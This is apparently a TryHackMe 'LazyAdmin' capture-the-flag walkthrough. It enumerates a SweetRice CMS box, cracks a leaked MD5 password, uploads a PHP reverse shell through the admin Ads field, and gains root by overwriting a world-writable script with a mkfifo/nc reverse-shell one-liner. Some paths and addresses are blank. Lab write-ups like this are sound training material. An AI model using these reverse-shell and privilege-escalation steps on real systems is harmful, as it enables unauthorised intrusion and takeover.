TryHackMe - LazyAdmin

Connect with OpenVPN for access to server at


Let’s scan with nmap, but save the results to a Metasploit database.

msfdb reinit
msf5 > db_nmap -sV

Port 22 (SSH) and Port 80 (HTTP) are open.

No credentials, so let’s check out the website being hosted. It’s the default Apache2 splash page.

Let’s run dirb to check the directory structure of the site.

$ dirb -R
---- Scanning URL: ----
==> DIRECTORY:
+ (CODE:200|SIZE:11321)
+ (CODE:403|SIZE:277)
---- Entering directory: ----
==> DIRECTORY:
==> DIRECTORY:
==> DIRECTORY:
==> DIRECTORY:

Navigate to the directory found by dirb, and see that the web server runs Basic CMS SweetRice.

$ searchsploit sweetrice
---------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                      |  Path
                                                                                                    | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------------------- ----------------------------------------
SweetRice 0.5.3 - Remote File Inclusion                                                             | exploits/php/webapps/10246.txt
SweetRice 0.6.7 - Multiple Vulnerabilities                                                          | exploits/php/webapps/15413.txt
SweetRice 1.5.1 - Arbitrary File Download                                                           | exploits/php/webapps/
SweetRice 1.5.1 - Arbitrary File Upload                                                             | exploits/php/webapps/
SweetRice 1.5.1 - Backup Disclosure                                                                 | exploits/php/webapps/40718.txt
SweetRice 1.5.1 - Cross-Site Request Forgery                                                        | exploits/php/webapps/40692.html
SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution                                   | exploits/php/webapps/40700.html
SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload                                               | exploits/php/webapps/14184.txt
---------------------------------------------------------------------------------------------------- ----------------------------------------


Reading through some of these text files, we come across 40718 (located at /usr/share/exploitdb/exploits/php/webapps/40718.txt). The file explains that MySQL backups are left unprotected and are stored under /inc/mysql_backup.

There is nothing at that location, so we check back in our dirb output and spot the directory listed there. Navigating to it, we find a single .sql file.

It is all condensed, but readable. We are particularly interested in this part:


Credentials! Let’s crack the password, which looks like an MD5 hash.

$ hashcat hash /usr/share/wordlists/rockyou.txt -m 0 --force

Log in to the admin console with manager:Password123.

Upload php-reverse-shell to the Ads section of the admin panel by pasting the script directly into the field. We name the ad reverse-shell.

Listen on the chosen port 1234 on the attacker machine:

$ nc -lvnp 1234

Navigate to where our ad is stored.

The attacker now has an unprivileged shell on the remote host.

$ whoami
$ cd /home
$ cd itguy
$ ls
$ cat user.txt
$ cat mysql_login.txt

Privilege Escalation

Let’s check what we are able to do as www-data.

$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/

$ cat

system("sh", "/etc/");

$ ls -al /etc/
-rw-r--rwx 1 root root 81 Nov 29 13:45 /etc/
# the "other" bits are rwx, so www-data has write permission on this file

$ cat /etc/
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 5554 >/tmp/f

# no text editor is available, so we overwrite the file by piping echo into it
$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 5554 >/tmp/f' > /etc/

In another terminal window:

$ nc -lvnp 5554
listening on [any] 5554 ...

Run on the remote host:

$ sudo /usr/bin/perl /home/itguy/

Back in the other terminal window:

connect to [] from (UNKNOWN) [] 60918
/bin/sh: 0: can't access tty; job control turned off
# whoami
# cd /root
# ls
# cat root.txt